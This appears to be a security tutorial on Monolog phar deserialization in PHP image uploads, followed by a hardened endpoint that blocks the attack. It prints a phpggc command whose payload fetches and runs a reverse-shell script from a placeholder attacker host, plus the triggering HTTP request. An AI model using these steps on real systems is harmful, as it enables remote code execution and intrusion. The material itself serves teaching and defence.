Monolog is a PHP logging library that sends logs to files, websockets, databases and other web services, and it is integrated into several frameworks. It is also known for the insecure deserialization vulnerability in its version 2.7. This can be triggered in several contexts, such as caching, but today I bring an example based on image upload functionality.
Once we verify that the application uses this library in this specific version (usually through the composer.json file), we can test for insecure deserialization in an image upload route, for example. But first we need to create the gadget with the PHPGGC collection:
phpggc -pj <base image> -o shell.jpg monolog/rce2 system 'curl http://<attacker-ip>/shell.sh|sh'
In the above example, the payload involves inducing a request to an attacker-controlled server and simultaneously downloading and executing a script containing a reverse shell, but it could be any command for PoC purposes, such as id.
Once the image is uploaded, consider that the application makes an API call to check if the image was actually uploaded successfully, through the GET method and passing the name of the image (which, in this case, contains serialized data) saved in a predefined directory as a parameter. For this data to be interpreted, we can pass the phar:// scheme as a prefix:
GET /api/success.php?archive=phar:///uploads/shell.jpg HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0
Referer: http://redacted.com/profile/avatar/upload.php
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.9
Connection: close
If the exploit was indeed successful, the attacker would see the request arrive at their HTTP server and obtain a reverse shell.
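The root cause on the application side is that a user-controlled value reaches a filesystem function unchanged, so a phar:// prefix causes PHP to unserialize the archive's metadata. As an added defensive example, not part of the original post, here is a hardened version of a hypothetical /api/success.php endpoint. The parameter name archive comes from the request above; the uploads directory, the allowed file-name pattern and the JSON response shape are assumptions.

```php
<?php
// Added defensive example (not from the original post): a hardened
// /api/success.php. UPLOAD_DIR and the file-name rules are assumptions.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/uploads'; // assumed location of saved uploads

// Phar deserialization is triggered through the phar:// stream wrapper.
// If the application never reads .phar archives, unregistering the
// wrapper removes the trigger for every filesystem function at once.
if (in_array('phar', stream_get_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}

/**
 * Map a user-supplied file name to a real path inside UPLOAD_DIR.
 * Returns null for anything that is not a plain image file name.
 */
function resolveUploadPath(string $userValue): ?string
{
    // Reject any value carrying a scheme (phar://, php://, file://, ...).
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $userValue)) {
        return null;
    }
    // Allow only a bare base name with an expected image extension;
    // this also rules out "../" and absolute paths.
    if (!preg_match('/^[A-Za-z0-9_\-]+\.(jpg|jpeg|png|gif)$/', $userValue)) {
        return null;
    }
    $base      = realpath(UPLOAD_DIR);
    $candidate = realpath(UPLOAD_DIR . DIRECTORY_SEPARATOR . $userValue);
    if ($base === false || $candidate === false) {
        return null;
    }
    // Defence in depth: the resolved path must still sit under UPLOAD_DIR.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

header('Content-Type: application/json');

$path = resolveUploadPath((string) ($_GET['archive'] ?? ''));
if ($path === null) {
    http_response_code(400);
    echo json_encode(['ok' => false, 'error' => 'invalid file name']);
    exit;
}

// Only now touch the filesystem, and only with a validated real path.
// getimagesize() confirms the stored file actually decodes as an image.
$ok = is_file($path) && getimagesize($path) !== false;
echo json_encode(['ok' => $ok]);
```

The order matters: validation happens before any call such as file_exists(), is_file() or getimagesize(), because each of those would already trigger metadata unserialization on a phar:// path. Unregistering the wrapper is the blanket mitigation; the path validation is what keeps the endpoint correct even on a deployment where the wrapper has to stay enabled.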